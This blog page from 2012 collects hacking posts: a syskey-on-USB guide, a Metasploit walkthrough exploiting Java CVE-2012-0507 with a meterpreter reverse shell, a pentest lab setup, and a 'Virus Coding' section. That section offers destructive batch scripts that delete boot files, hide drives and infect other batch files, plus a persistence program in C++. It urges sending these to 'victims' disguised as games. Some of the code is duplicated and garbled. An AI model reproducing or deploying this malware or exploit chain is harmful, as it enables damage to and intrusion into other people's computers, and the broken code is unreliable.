Monday, August 27, 2012

Lock/Unlock Computer With Pendrive


First, what is “syskey”?

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.
SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from Bind  View found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.
Microsoft later collaborated with Bind View to issue a fix for the problem (dubbed the ‘Syskey Bug’) which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.
According to Todd Sabin of the Bind View team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.
So this is pretty cool, right?  Well, I really like the idea of keeping this on Floppy so that it requires a floppy disk (a sort of 2 factor (hardware/software) authentication?).
Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.
NOTE:  I haven’t tested copying data from 1 USB to another USB to see if it works as a backup.  This way you could lock up a USB drive as a spare if needed.
Here’s how to get this to work using a USB drive.
1.  Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.
2.  Fire up disk management and re-assign the drive letter it was given to “A”.


Start up disk management by clicking Start and typing diskmgmt.msc



Right-click the USB drive and choose to assign driver letter or path.

Assign it to letter “A”

Accept the warning message

Now your USB drive is “A”

3.  Run Syskey and save encryption to USB Drive “A”

Click Start and type syskey followed by hitting Enter

Syskey launched; Click “Update”

Choose “Store Startup key on floppy disk” and click “OK”

You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.
4.  Reboot and have fun.  Don’t lose your USB disk!  Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507



Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.
Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.


Step 4:Upload files

Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.

conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me. 

Virus Coding


 

Viruses tha crushes your own PC!

@echo
offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!
Type this in notepad
start virus.bat
virus.bat
and save as with this name – virus.bat
ur antivirus will not detect this virus.
Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c then replace c with d.
Save it as 'sth.bat'(Virus Coding)!!
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
Sleep(60);
}
}
for ( int j = 0; j
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
}
goto START;
}
Matrix Virus!
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
Sleep(60);
}
}
for ( int j = 0; j
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
}
goto START;
}
Open notepad and paste this:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as eicar.com. The Anti-Virus should stop you (if it does that means its working).
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System is hacked by us!\” -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “www.ethicalhack4u.blogspot.com”
start firefox “www.maverick-deepanker.blogspot.com”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart
How to create an advanced and dangerous virus:
@echo off>nul.ViRuS
if “%1==”/ViRuS_MULTIPLY goto ViRuS_multiply
if “%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if “%1==”/ViRuS_FINDSELF goto ViRuS_findself
if “%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if “%ViRuSname%==” goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it’s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT
:ViRuS_findself
if “%2==” goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself
:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
:ViRuS_multiply
find “ViRuS” xViRuSx.bat
find /v “ViRuS” >xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This Virus Is Made By U-Hacker.
:XXX_END
Save it as virus7.exe and release the monster.

Sunday, August 26, 2012

Protect your Computer from Viruses and Hackers


How do you protect your computer? 

Check this out [Works for Windows XP, Vista]

This trick will help against Hackers & Viruses(Mostly for Viruses it is Helpful)

Caution: You must be Admin or must have Admin privileges

Step 1:

Go To “Folder Option” in “Control Panel” –>”View Tab”
Uncheck “Use Simple File Sharing” –> Apply & OK.

Step 2:

Right Click on C: Drive(If Operating System is installed in C: drive) –> Properties.
You will see a new tab as “Security”, click on it .
Select User’s at “Group or user names” (you will see all permissions of users on C:Drive) –>Edit It As per your requirement(Suggestion: Uncheck Write Permission For All Users except Admin) & Apply it.
Restart It!!

Mission Over 

[Suggestion: Use this trick during fresh installation & Just Use Any Other user who has no Admin privileges]

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

We have provide you plenty of Ethical hacking and Pentesting tutorial, still more article is going to come.  Meanwhile, i like to teach you how to set up your own Pen Testing/ hacking network Lab.

Use of your own Pen Testing Lab:

  • Free, free ,free..! It's free lab, because it is yours..
  • Only one system is enough
  • can Practice your pentesting/hacking skills 
  • can install any kind of malwares(spyware,trojan) or RATs and test how it works
  • and more ...
is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually .  Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system . 

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will you explain everything about Virtualbox and how to setup Guest OS.

I hope you now familiar with installing Guest OS.

Set Up your Target system:
Now we have to set up the target system.  Install the Windows XP in VirtualBox using the xp.iso file.  After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:
Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools .  We will hack the target system using this backtrack.

Network Settings for Guest Os:
Step 1:
click the File menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network

Step2:

Right click on the Guest OX(eg:xp,backtrack) and select the Settings.
Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"
Do the same thing for both Guest OS.

Step 3:


Now run the both guest os .
Finding the IP address of Target System:
open the Windows XP Guest OS window.
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101
Hacking with Pen Testing System:
open the Terminal  and type "nmap 192.168.56.101".
Now it will show the list of open port.

You can hack the target system with open ports.